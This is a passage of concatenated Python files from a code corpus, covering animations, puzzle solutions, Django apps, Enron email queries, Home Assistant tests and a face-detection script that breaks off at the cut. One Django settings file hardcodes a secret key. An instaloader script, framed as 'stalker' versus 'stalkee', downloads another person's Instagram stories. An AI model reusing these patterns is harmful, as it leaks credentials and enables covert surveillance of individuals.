musc.set_xdata(muscles[i][:, 0])\n musc.set_ydata(muscles[i][:, 1] - 1)\n\n # Text\n self.anims[4].set_text(\"Time: {:.1f}\".format(self.time[index]))\n\n # Neurons\n if self.neural_sys is not None:\n n_rate = self.neural_sys.n_act(self.state[index, 6:])\n self.anims[5].set_color(\n np.asarray([[0.0, n_rate[0], 0.0, 1.0],\n [0.0, n_rate[1], 0.0, 1.0],\n [0.0, n_rate[2], 0.0, 1.0],\n [0.0, n_rate[3], 0.0, 1.0]]))\n # self.anims[5].set_sizes(np.ones(4) * 250)\n self.anims[5].set_offsets(self.neurons_pos)\n p1 = (\n self.muscle_sys.muscle_1_pos_curr[0, :] +\n self.muscle_sys.muscle_1_pos_curr[1, :]\n )*0.5\n p2 = (\n self.muscle_sys.muscle_2_pos_curr[0, :] +\n self.muscle_sys.muscle_2_pos_curr[1, :]\n )*0.5\n self.anims[6].xy = (p1[0], p1[1]-1)\n self.anims[7].xy = (p2[0], p2[1]-1)\n return self.anims\n\n","sub_path":"Lab6/Python/system_animation.py","file_name":"system_animation.py","file_ext":"py","file_size_in_byte":7535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"504366038","text":"import time\n\nstart = time.clock()\n\n\ndef binarySearch(alist, item):\n first = 0\n last = len(alist)-1\n found = False\n\n while first<=last and not found:\n midpoint = (first + last)//2\n if alist[midpoint] == item:\n found = True\n else:\n if item < alist[midpoint]:\n last = midpoint-1\n else:\n first = midpoint+1\n\n return found\n\n\ndef gen_primes():\n \"\"\" Generate an infinite sequence of prime numbers.\n \"\"\"\n # Maps composites to primes witnessing their compositeness.\n # This is memory efficient, as the sieve is not \"run forward\"\n # indefinitely, but only as long as required by the current\n # number being tested.\n #\n D = {}\n\n # The running integer that's checked for primeness\n q = 2\n\n while True:\n if q not in D:\n # q is a new prime.\n # Yield it and mark its first multiple that isn't\n # already marked in previous iterations\n #\n yield q\n D[q * q] = [q]\n else:\n # q is composite. D[q] is the list of primes that\n # divide it. 
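The `_animate` method in the SystemAnimation record above maps a wall-clock time to the nearest stored sample with `np.argmin((self.time - time)**2)`. A short standalone illustration of that lookup follows, together with the equivalent `np.searchsorted` form, which avoids scanning the whole array when the timestamps are sorted; the sample timestamps are made up for the demo.

```python
# Sketch: nearest-timestamp lookup, as used by _animate above.
import numpy as np

t = np.linspace(0.0, 2.0, 11)          # simulated timestamps, dt = 0.2

def nearest_argmin(times, query):
    # O(n) scan, identical in spirit to the animation code
    return int(np.argmin((times - query) ** 2))

def nearest_sorted(times, query):
    # O(log n) when `times` is sorted ascending
    i = int(np.clip(np.searchsorted(times, query), 1, len(times) - 1))
    # pick whichever neighbour is closer
    return i if abs(times[i] - query) < abs(times[i - 1] - query) else i - 1

assert nearest_argmin(t, 0.73) == nearest_sorted(t, 0.73) == 4  # t[4] = 0.8
```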
Since we've reached q, we no longer\n # need it in the map, but we'll mark the next\n # multiples of its witnesses to prepare for larger\n # numbers\n #\n for p in D[q]:\n D.setdefault(p + q, []).append(p)\n del D[q]\n\n q += 1\n\n#generate the xth prime number\ndef prime_lim(limit):\n i = 1\n for next_prime in gen_primes():\n\n if i > limit:\n print(last_prime)\n print(next_prime)\n return\n last_prime = next_prime\n i = i + 1\n\n\ndef export_prime_lim(limit):\n vector = []\n for next_prime in gen_primes():\n\n if next_prime > limit:\n return vector\n vector.append(next_prime)\n\n\nvalue = 1000000\nprimes = export_prime_lim(value)\n\ncumul_primes = [0]\ntemp = 0\nfor i in range(0,len(primes)):\n temp += primes[i]\n cumul_primes.append(temp)\n\nmaxval = 0\nmaxlen = 0\n\nfor i in range(0,len(cumul_primes)):\n\n for j in range(i,0,-1):\n temp = cumul_primes[i] - cumul_primes[j]\n #if temp in primes:\n if (j == 0 and (i - j) % 2 == 0) or (j > 0 and (i - j) % 2 == 1):\n if binarySearch(primes, temp):\n if i - j > maxlen:\n maxlen = i - j\n maxval = temp\n\n if (cumul_primes[i] - cumul_primes[j]) > value:\n break\n\nprint(maxlen)\nprint(maxval)\n\n\nend = time.clock()\n\nprint(\"time = {} seconds\".format(round(end - start, 3)))\n","sub_path":"p50 consec prime sum.py","file_name":"p50 consec prime sum.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"581805845","text":"#Django settings for blog project.\n\nimport mongoengine\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nSECRET_KEY = '(ena%dz&990zlr(-!si=lhg5uts5fj6%defy7scu^t=k&+hmkz'\n\nDEBUG = False\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = ['*']\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nAUTHENTICATION_BACKENDS = (\n 'mongoengine.django.auth.MongoEngineBackend',\n)\n\nROOT_URLCONF = 'blog.urls'\n\nWSGI_APPLICATION = 'blog.wsgi.application'\n\n# Database\n\nSESSION_ENGINE = 'mongoengine.django.sessions'\n_MONGODB_USER = os.environ['MONGODB_USER']\n_MONGODB_PASSWD = os.environ['MONGODB_PASSWD']\n_MONGODB_HOST = os.environ['MONGODB_HOST']\n_MONGODB_NAME = os.environ['MONGODB_NAME']\n_MONGODB_DATABASE_HOST = 'mongodb://%s:%s@%s/%s' % (_MONGODB_USER, _MONGODB_PASSWD, _MONGODB_HOST, _MONGODB_NAME)\n\nmongoengine.connect(_MONGODB_NAME, host=_MONGODB_DATABASE_HOST)\n\n# Internationalization\n\nLANGUAGE_CODE = 'es-CO'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Template files\n\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR,'./templates'),\n)\n\n# Static files (CSS, JavaScript, Images)\n\nSTATIC_URL = '/static/'\n\nMEDIA_URL = '/media/'\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR,'./static'),\n)\n\nif not DEBUG:\n AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']\n AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\n AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n DEFAULT_FILE_STORAGE = 
'londonbridgepub.s3utils.MediaRootS3BotoStorage'\n    STATICFILES_STORAGE = 'londonbridgepub.s3utils.StaticRootS3BotoStorage'\n    S3_URL = 'http://%s.s3.amazonaws.com/' % AWS_STORAGE_BUCKET_NAME\n    STATIC_URL = S3_URL + 'static/'\n    MEDIA_URL = S3_URL + 'media/'","sub_path":"blog/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"10159861","text":"from functools import reduce\nfrom collections import defaultdict\nfrom collections import deque\nimport math\n\ndef btf(i,d,N):\n    q = deque()\n    q.append(i)\n    dist = [-1]*N\n    dist[i] = 0\n    i = 1\n    while q:\n        l = len(q)\n        for j in range(l):\n            next_node = q.popleft()\n            for succ in d[next_node]:\n                if dist[succ] == -1:\n                    dist[succ] = i\n                    q.append(succ)\n        i +=1\n    return dist\n\ndef main():\n    # Convert a binary string to a number\n    # '101' → 5\n    # Prepend '0b' to the string and pass it to int()\n    # binary = int('0b'+'101',0)\n\n    # Count the set bits of a binary number\n    # 101(0x5) → 2\n    # cnt_bit = bin(5).count('1')\n    \n    # Compute N!\n    # f = math.factorial(N)\n\n    # Modular inverse of N\n    # N_inv = pow(N,MOD-2,MOD)\n\n    # nCr\n    # N! * modular inverse of r! * modular inverse of (N-r)!\n    \n    # Floor division\n    # 4 // 3\n    # Ceiling division\n    #-(-4 // 3)\n    \n    # For initial values: a sufficiently large number (10 billion)\n    INF = float(\"inf\")\n\n    # A large prime\n    MOD = 10**9+7\n    \n    # Read a single token\n    # Input: 2\n    # a = input().rstrip()\n    # Variable: a='2'\n    \n    # Read space-separated stdin into variables\n    # Input: 2 4 5 7\n    # a, b, c, d = (int(_) for _ in input().split()) \n    # Variables: a=2 b=4 c=5 d=7\n    \n    # Read space-separated stdin into a list\n    # Input: 2 4 5 7\n    # a = list(int(_) for _ in input().split())\n    # Variable: a = [2, 4, 5, 7] \n\n    # Read stdin one character at a time into a list\n    # Input: 2457\n    # a = list(int(_) for _ in input())\n    # Variable: a = [2, 4, 5, 7] \n    N,M = (int(_) for _ in input().split())\n    d = defaultdict(list)\n    \n    for i in range(M):\n        s1,s2 = (int(_) for _ in input().split())\n        d[s1-1].append(s2-1)\n        d[s2-1].append(s1-1)\n\n    dist = btf(0,d,N)\n\n    if dist[N-1] == 2:\n        print('POSSIBLE')\n    else:\n        print('IMPOSSIBLE')\n    \nif __name__ == '__main__':\n    main()\n","sub_path":"ABC/068/C/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"469295250","text":"''' problem - https://programmers.co.kr/learn/courses/30/lessons/42587\n    Printer\n    \n    This problem relates to stacks and queues\n'''\n\ndef solution(priorities, location):\n    '''Key point: get the max from priorities and compare it with the first element of the list\n        -> If the first element is the largest number, it is removed from the list.\n        -> If that first element is the location, end the loop.\n        -> If the first element is not the largest number, it goes to the end of the list.\n        -> If that first element is the location, the location index moves to the end of the list.\n    '''\n\n    key = priorities[location]\n    result = 0\n    while True:\n        max_number = max(priorities)\n        if key == max_number and location == 0:\n            result += 1\n            break\n        if priorities[0] == max_number:\n            priorities.remove(priorities[0])\n            location -= 1\n            result += 1\n        elif location == 0 and key < max_number:\n            priorities.append(priorities.pop(0))\n            location = len(priorities) - 1 \n        elif location > 0 and priorities[0] <= max_number:\n            priorities.append(priorities.pop(0))\n            location -= 1\n\n    return result","sub_path":"이진호/day02/day02_200901.py","file_name":"day02_200901.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"500262558","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 15 15:22:50 2016\r\n\r\n@author: 
sbbk529\r\n\"\"\"\r\n\r\nimport datetime\r\nimport mysql.connector\r\n\r\ncnx = mysql.connector.connect(user='root',host='127.0.0.1',database='enrondb')\r\n\r\ncursor = cnx.cursor()\r\n\r\nfirstNames = [\"kenneth\", \"jeffrey\", \"andrew\", \"richard\", \"micheal\", \"lea\", \"ben\", \"dave\", \"mark\"]\r\n\r\nlastNames = [\"lay\", \"skilling\", \"fastow\", \"causay\", \"kapper\", \"fastow\", \"glisan\", \"delainey\", \"koenig\"]\r\n\r\nkeywords = [\"FERC\", \"Affair\", \"Devastating\", \"Investigation\", \"Disclosure\", \"Bonus\", \"Meeting\", \"Plan\", \"Services\", \"Report\"]\r\n\r\nfor i in range(0,len(firstNames)):\r\n    \r\n    queryText = \"SELECT Email_id FROM employeelist WHERE LOWER(firstName) LIKE \\\"%\"\r\n    queryText += firstNames[i] + \"%\\\" AND LOWER(lastName) LIKE \\\"%\" \r\n    queryText += lastNames[i] + \"%\\\"\"\r\n    query = (queryText)\r\n    \r\n    queryText = \"SELECT COUNT(sender) FROM message WHERE LOWER(sender) LIKE \\\"%\"\r\n    queryText += firstNames[i] + \"%\\\" AND LOWER(sender) LIKE \\\"%\" \r\n    queryText += lastNames[i] + \"%\\\"\"\r\n    query = (queryText)  # note: this overwrites the employeelist query built above\r\n    \r\n#    queryText = \"SELECT COUNT(rvalue) FROM recipientinfo WHERE LOWER(rvalue) LIKE \\\"%\"\r\n#    queryText += firstNames[i] + \"%\\\" AND LOWER(rvalue) LIKE \\\"%\" \r\n#    queryText += lastNames[i] + \"%\\\"\"\r\n#    query = (queryText)\r\n\r\n    cursor.execute(query)\r\n    \r\n    \r\n    for (Email_id) in cursor:\r\n        print(str(i) +\" \" +firstNames[i] + \" \" + lastNames[i] + \" \" + str(Email_id))\r\n\r\ncursor.close()\r\ncnx.close()","sub_path":"Enron Datasets/SQL Queries/2016.07.17 - EnronDataQueries/2016.07.17 - EnronDataQueries/mySQL_connect.py","file_name":"mySQL_connect.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"449289740","text":"# import the necessary packages\nimport argparse\nimport instaloader\n \n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-l\", \"--login\", required=True, help=\"Login of the stalker.\")\nap.add_argument(\"-u\", \"--user\", required=True, help=\"Username of the stalkee.\")\nargs = vars(ap.parse_args())\n\n# Get instance\nL = instaloader.Instaloader()\n\n# Optionally, login or load session\nL.interactive_login(args[\"login\"])\n\n# Download only the stories of the user.\nL.download_profile(args[\"user\"], profile_pic=False, download_stories_only=True)\n\n# fast_update=True doesn't work for some reason. If it did, it would only download the stuff it doesn't already have. It only works in stories.\n","sub_path":"playground/downloadStory.py","file_name":"downloadStory.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
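The mySQL_connect.py record above splices names straight into SQL text with escaped quotes, which is fragile and injection-prone. A hedged sketch of the same employeelist lookup using mysql.connector's parameter binding follows; the connection settings simply mirror the original script and are assumptions about the local setup.

```python
# Sketch: the same LIKE query as mySQL_connect.py above, but with %s
# placeholders so the driver handles quoting and escaping.
import mysql.connector

cnx = mysql.connector.connect(user='root', host='127.0.0.1', database='enrondb')
cursor = cnx.cursor()

sql = ("SELECT Email_id FROM employeelist "
       "WHERE LOWER(firstName) LIKE %s AND LOWER(lastName) LIKE %s")
for first, last in [("kenneth", "lay"), ("jeffrey", "skilling")]:
    # parameters are passed separately, never concatenated into the SQL
    cursor.execute(sql, ('%' + first + '%', '%' + last + '%'))
    for (email_id,) in cursor:
        print(first, last, email_id)

cursor.close()
cnx.close()
```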
{"seq_id":"495753386","text":"# Test a grayscale CNN model on images simulated to represent different lighting conditions\n# Without Grey-Edge filtering\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nnp.set_printoptions(precision=2)\nfrom transform import grey_edge\n\n# Open the CNN model\nmodel = keras.models.load_model('models/ge-model.h5') \n\n# Test the model on each lighting scenario and record its outputs\nepochs = ['', '_gamma0', '_gamma4'] #, '_dark', '_light']\noutputs = []\nfor i,epoch in enumerate(epochs):\n    outputs.append([])\n    source = cv2.VideoCapture('epoch/test/Car_test{}.avi'.format(epoch))\n    while True:\n        ret, frame = source.read()\n        if not ret:\n            break\n        # convert to grayscale, then back to 3 channels for the model input\n        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n        frame = cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR) \n        frame = cv2.resize(frame, (200,66))\n        frame = np.expand_dims(frame, 0)\n        outputs[i].append(model.predict(frame)[0][0].item())\n    source.release()\n\n# Create a graph of the output sequence on the original test dataset\nxvals = range(len(outputs[0]))\nplt.figure()\nplt.plot(xvals, outputs[0], label='Original')\nplt.xlabel(\"Frame #\")\nplt.xticks(xvals)\nplt.ylabel(\"Control Output\")\nplt.ylim((-1,1))\nplt.legend()\nplt.savefig(\"figs/fig4a.pdf\")\n\n# Create a graph of the output sequence on the gamma-0 simulated test dataset\nplt.figure()\nplt.plot(xvals, outputs[1], label='Gamma 0')\nplt.xlabel(\"Frame #\")\nplt.xticks(xvals)\nplt.ylabel(\"Control Output\")\nplt.ylim((-1,1))\nplt.legend()\nplt.savefig(\"figs/fig4b.pdf\")\n\n# Create a graph of the output sequence on the gamma-4 simulated test dataset\nplt.figure()\nplt.plot(xvals, outputs[2], label='Gamma 4')\nplt.xlabel(\"Frame #\")\nplt.xticks(xvals)\nplt.ylabel(\"Control Output\")\nplt.ylim((-1,1))\nplt.legend()\nplt.savefig(\"figs/fig4c.pdf\")\n","sub_path":"eval_noge_models.py","file_name":"eval_noge_models.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"366913087","text":"from django.shortcuts import render, redirect\nfrom .models import Contacts\n\n\ndef index(request):\n    contacts = Contacts.objects.all()\n    search_input = request.GET.get('search_area')\n    if search_input:\n        contacts = Contacts.objects.filter(full_name__icontains=search_input)\n    else:\n        contacts = Contacts.objects.all()\n        search_input = ' '\n\n    return render(request, 'index.html', {'contacts': contacts, 'search_input': search_input})\n\n\ndef add_contact(request):\n    if request.method == 'POST':\n        new_contact = Contacts(\n            full_name=request.POST['fullname'],\n            relationship=request.POST['relationship'],\n            email=request.POST['email'],\n            phone_number=request.POST['phone_number'],\n            address=request.POST['address']\n        )\n        new_contact.save()\n        return redirect('/')\n\n    return render(request, 'new.html')\n\n\ndef contact_details(request, pk):\n    contact = Contacts.objects.get(id=pk)\n    return render(request, 'contact-profile.html', {'contact': contact})\n\n\ndef edit_contact(request, pk):\n    contact = Contacts.objects.get(id=pk)\n\n    if request.method == \"POST\":\n        contact.full_name = request.POST['fullname']\n        contact.relationship = request.POST['relationship']\n        contact.email = 
request.POST['email']\n contact.phone_number = request.POST['phone_number']\n contact.address = request.POST['address']\n contact.save()\n\n return redirect('/contact_details/'+str(contact.id))\n\n return render(request, 'edit.html', {'contact': contact})\n\n\ndef delete_contact(request, pk):\n contact = Contacts.objects.get(id=pk)\n\n if request.method == \"POST\":\n contact.delete()\n return redirect(index)\n\n return render(request, 'delete.html', {'contact': contact})\n","sub_path":"mycontacts_list/contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"465621230","text":"\"\"\"Tests for the SmartThings component init module.\"\"\"\nfrom unittest.mock import Mock, patch\nfrom uuid import uuid4\n\nfrom aiohttp import ClientConnectionError, ClientResponseError\nfrom pysmartthings import InstalledAppStatus\nimport pytest\n\nfrom homeassistant.components import smartthings\nfrom homeassistant.components.smartthings.const import (\n DATA_BROKERS, DOMAIN, EVENT_BUTTON, SIGNAL_SMARTTHINGS_UPDATE,\n SUPPORTED_PLATFORMS)\nfrom homeassistant.exceptions import ConfigEntryNotReady\nfrom homeassistant.helpers.dispatcher import async_dispatcher_connect\n\nfrom tests.common import mock_coro\n\n\nasync def test_unrecoverable_api_errors_create_new_flow(\n hass, config_entry, smartthings_mock):\n \"\"\"\n Test a new config flow is initiated when there are API errors.\n\n 401 (unauthorized): Occurs when the access token is no longer valid.\n 403 (forbidden/not found): Occurs when the app or installed app could\n not be retrieved/found (likely deleted?)\n \"\"\"\n api = smartthings_mock.return_value\n for error_status in (401, 403):\n setattr(hass.config_entries, '_entries', [config_entry])\n api.app.return_value = mock_coro(\n exception=ClientResponseError(None, None,\n status=error_status))\n\n # Assert setup returns false\n result = await smartthings.async_setup_entry(hass, config_entry)\n assert not result\n\n # Assert entry was removed and new flow created\n await hass.async_block_till_done()\n assert not hass.config_entries.async_entries(DOMAIN)\n flows = hass.config_entries.flow.async_progress()\n assert len(flows) == 1\n assert flows[0]['handler'] == 'smartthings'\n assert flows[0]['context'] == {'source': 'import'}\n hass.config_entries.flow.async_abort(flows[0]['flow_id'])\n\n\nasync def test_recoverable_api_errors_raise_not_ready(\n hass, config_entry, smartthings_mock):\n \"\"\"Test config entry not ready raised for recoverable API errors.\"\"\"\n setattr(hass.config_entries, '_entries', [config_entry])\n api = smartthings_mock.return_value\n api.app.return_value = mock_coro(\n exception=ClientResponseError(None, None, status=500))\n\n with pytest.raises(ConfigEntryNotReady):\n await smartthings.async_setup_entry(hass, config_entry)\n\n\nasync def test_connection_errors_raise_not_ready(\n hass, config_entry, smartthings_mock):\n \"\"\"Test config entry not ready raised for connection errors.\"\"\"\n setattr(hass.config_entries, '_entries', [config_entry])\n api = smartthings_mock.return_value\n api.app.return_value = mock_coro(\n exception=ClientConnectionError())\n\n with pytest.raises(ConfigEntryNotReady):\n await smartthings.async_setup_entry(hass, config_entry)\n\n\nasync def test_base_url_no_longer_https_does_not_load(\n hass, config_entry, app, smartthings_mock):\n \"\"\"Test base_url no longer valid creates a new flow.\"\"\"\n hass.config.api.base_url = 
'http://0.0.0.0'\n setattr(hass.config_entries, '_entries', [config_entry])\n api = smartthings_mock.return_value\n api.app.return_value = mock_coro(return_value=app)\n\n # Assert setup returns false\n result = await smartthings.async_setup_entry(hass, config_entry)\n assert not result\n\n\nasync def test_unauthorized_installed_app_raises_not_ready(\n hass, config_entry, app, installed_app,\n smartthings_mock):\n \"\"\"Test config entry not ready raised when the app isn't authorized.\"\"\"\n setattr(hass.config_entries, '_entries', [config_entry])\n setattr(installed_app, '_installed_app_status',\n InstalledAppStatus.PENDING)\n\n api = smartthings_mock.return_value\n api.app.return_value = mock_coro(return_value=app)\n api.installed_app.return_value = mock_coro(return_value=installed_app)\n\n with pytest.raises(ConfigEntryNotReady):\n await smartthings.async_setup_entry(hass, config_entry)\n\n\nasync def test_config_entry_loads_platforms(\n hass, config_entry, app, installed_app,\n device, smartthings_mock):\n \"\"\"Test config entry loads properly and proxies to platforms.\"\"\"\n setattr(hass.config_entries, '_entries', [config_entry])\n\n api = smartthings_mock.return_value\n api.app.return_value = mock_coro(return_value=app)\n api.installed_app.return_value = mock_coro(return_value=installed_app)\n api.devices.return_value = mock_coro(return_value=[device])\n\n with patch.object(hass.config_entries, 'async_forward_entry_setup',\n return_value=mock_coro()) as forward_mock:\n assert await smartthings.async_setup_entry(hass, config_entry)\n # Assert platforms loaded\n await hass.async_block_till_done()\n assert forward_mock.call_count == len(SUPPORTED_PLATFORMS)\n\n\nasync def test_unload_entry(hass, config_entry):\n \"\"\"Test entries are unloaded correctly.\"\"\"\n broker = Mock()\n broker.event_handler_disconnect = Mock()\n hass.data[DOMAIN][DATA_BROKERS][config_entry.entry_id] = broker\n\n with patch.object(hass.config_entries, 'async_forward_entry_unload',\n return_value=mock_coro(\n return_value=True\n )) as forward_mock:\n assert await smartthings.async_unload_entry(hass, config_entry)\n assert broker.event_handler_disconnect.call_count == 1\n assert config_entry.entry_id not in hass.data[DOMAIN][DATA_BROKERS]\n # Assert platforms unloaded\n await hass.async_block_till_done()\n assert forward_mock.call_count == len(SUPPORTED_PLATFORMS)\n\n\nasync def test_event_handler_dispatches_updated_devices(\n hass, device_factory, event_request_factory):\n \"\"\"Test the event handler dispatches updated devices.\"\"\"\n devices = [\n device_factory('Bedroom 1 Switch', ['switch']),\n device_factory('Bathroom 1', ['switch']),\n device_factory('Sensor', ['motionSensor']),\n ]\n device_ids = [devices[0].device_id, devices[1].device_id,\n devices[2].device_id]\n request = event_request_factory(device_ids)\n called = False\n\n def signal(ids):\n nonlocal called\n called = True\n assert device_ids == ids\n async_dispatcher_connect(hass, SIGNAL_SMARTTHINGS_UPDATE, signal)\n broker = smartthings.DeviceBroker(\n hass, devices, request.installed_app_id)\n\n await broker.event_handler(request, None, None)\n await hass.async_block_till_done()\n\n assert called\n for device in devices:\n assert device.status.values['Updated'] == 'Value'\n\n\nasync def test_event_handler_ignores_other_installed_app(\n hass, device_factory, event_request_factory):\n \"\"\"Test the event handler dispatches updated devices.\"\"\"\n device = device_factory('Bedroom 1 Switch', ['switch'])\n request = 
event_request_factory([device.device_id])\n called = False\n\n def signal(ids):\n nonlocal called\n called = True\n async_dispatcher_connect(hass, SIGNAL_SMARTTHINGS_UPDATE, signal)\n broker = smartthings.DeviceBroker(hass, [device], str(uuid4()))\n\n await broker.event_handler(request, None, None)\n await hass.async_block_till_done()\n\n assert not called\n\n\nasync def test_event_handler_fires_button_events(\n hass, device_factory, event_factory, event_request_factory):\n \"\"\"Test the event handler fires button events.\"\"\"\n device = device_factory('Button 1', ['button'])\n event = event_factory(device.device_id, capability='button',\n attribute='button', value='pushed')\n request = event_request_factory(events=[event])\n called = False\n\n def handler(evt):\n nonlocal called\n called = True\n assert evt.data == {\n 'component_id': 'main',\n 'device_id': device.device_id,\n 'location_id': event.location_id,\n 'value': 'pushed',\n 'name': device.label\n }\n hass.bus.async_listen(EVENT_BUTTON, handler)\n broker = smartthings.DeviceBroker(\n hass, [device], request.installed_app_id)\n await broker.event_handler(request, None, None)\n await hass.async_block_till_done()\n\n assert called\n","sub_path":"tests/components/smartthings/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":8166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"514201125","text":"\"\"\"Script for choosing only membrane cogs\"\"\"\nimport seaborn as sns\nimport pandas as pd\nfrom collections import Counter\nimport matplotlib.pyplot as plt\n\ntmhmm_path = 'data/711Genomes.tmhmm.txt'\ncogdb_path = 'data/cog2003-2014.csv'\nthreshold = 0.99\nprofile_img_output = 'profile.svg'\nmembr_cogs_list_output = 'data/membrane.txt'\n\n\n# proteins with two or more predicted helices\nmembrane_prots = [\n t.split('|')[0] for t in list(map(lambda x: x.strip(), open(tmhmm_path)))\n if int(t.split('PredHel=')[1].split('\\t')[0]) > 1\n]\n\ndb = pd.read_csv(cogdb_path, header=None, skipinitialspace=True)\nmembr_prots_in_cog = Counter(db[db[0].isin(membrane_prots)][6])\nprots_in_cog = Counter(db[6])\n\nmembrane_part = {}\nfor key in membr_prots_in_cog:\n membrane_part[key] = membr_prots_in_cog[key]/prots_in_cog[key]\n\n# drawing distribution of membranous part in cogs\nplt.figure(figsize=(12, 9))\nplt.title('Membrane proteins parts in COGs. 
Distribution')\nplt.xlabel('membrane proteins part')\nsns.distplot(list(membrane_part.values()), kde=None, bins=100)\nplt.tight_layout()\nplt.savefig(profile_img_output)\n\n# writing COGs with MP >= threshold\nwith open(membr_cogs_list_output, 'w') as fout:\n for key in membrane_part:\n if membrane_part[key] >= threshold:\n fout.write(key+'\\n')\n","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"2720067","text":"# -*- coding: utf-8 -*-\nimport sqlite3\n\nclass NbapttPipeline(object):\n def open_spider(self, spider):\n self.conn = sqlite3.connect (\"nbaptt.db\") \n self.cur = self.conn.cursor()\n sql = '''Create table nba_ptt( \n title TEXT,\n author TEXT,\n date TEXT)'''\n self.cur.execute(sql)\n def close_spider(self, spider):\n self.conn.commit()\n self.conn.close()\n def process_item(self, item, spider):\n title = item['title']\n author = item['author']\n price = item['date']\n x = (title, author, price)\n sql = '''insert into nba_ptt values(?,?,?)''' \n self.conn.execute(sql,x)\n return item\n","sub_path":"exercise/crawler_python_dm1920/ch26/nbaptt/nbaptt/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"30710324","text":"from __future__ import print_function\r\nimport os\r\nimport argparse\r\nimport torch\r\nimport numpy as np\r\nfrom data import cfg_mnet, cfg_re50\r\nfrom layers.functions.prior_box import PriorBox\r\nfrom utils.nms.py_cpu_nms import py_cpu_nms\r\nimport cv2\r\nfrom models.retinaface import RetinaFace\r\nfrom utils.box_utils import decode, decode_landm\r\nimport time\r\nfrom tqdm import tqdm, trange\r\n\r\nparser = argparse.ArgumentParser(description='Retinaface')\r\n\r\nparser.add_argument('-m', '--trained_model', default='./weights/Resnet50_Final.pth',\r\n type=str, help='Trained state_dict file path to open')\r\nparser.add_argument('--network', default='resnet50', help='Backbone network mobile0.25 or resnet50')\r\nparser.add_argument('--cpu', action=\"store_true\", default=False, help='Use cpu inference')\r\nparser.add_argument('--confidence_threshold', default=0.02, type=float, help='confidence_threshold')\r\nparser.add_argument('--top_k', default=5000, type=int, help='top_k')\r\nparser.add_argument('--nms_threshold', default=0.4, type=float, help='nms_threshold')\r\nparser.add_argument('--keep_top_k', default=750, type=int, help='keep_top_k')\r\nparser.add_argument('-s', '--save_image', action=\"store_true\", default=True, help='show detection results')\r\nparser.add_argument('--vis_thres', default=0.6, type=float, help='visualization_threshold')\r\nargs = parser.parse_args()\r\n\r\n# python -B crop_dataset.py --trained_model ./weights/mobilenet0.25_Final.pth --network mobile0.25 --cpu\r\n\r\n\r\ndef check_keys(model, pretrained_state_dict):\r\n ckpt_keys = set(pretrained_state_dict.keys())\r\n model_keys = set(model.state_dict().keys())\r\n used_pretrained_keys = model_keys & ckpt_keys\r\n unused_pretrained_keys = ckpt_keys - model_keys\r\n missing_keys = model_keys - ckpt_keys\r\n print('Missing keys:{}'.format(len(missing_keys)))\r\n print('Unused checkpoint keys:{}'.format(len(unused_pretrained_keys)))\r\n print('Used keys:{}'.format(len(used_pretrained_keys)))\r\n assert len(used_pretrained_keys) > 0, 'load NONE from pretrained checkpoint'\r\n return True\r\n\r\n\r\ndef 
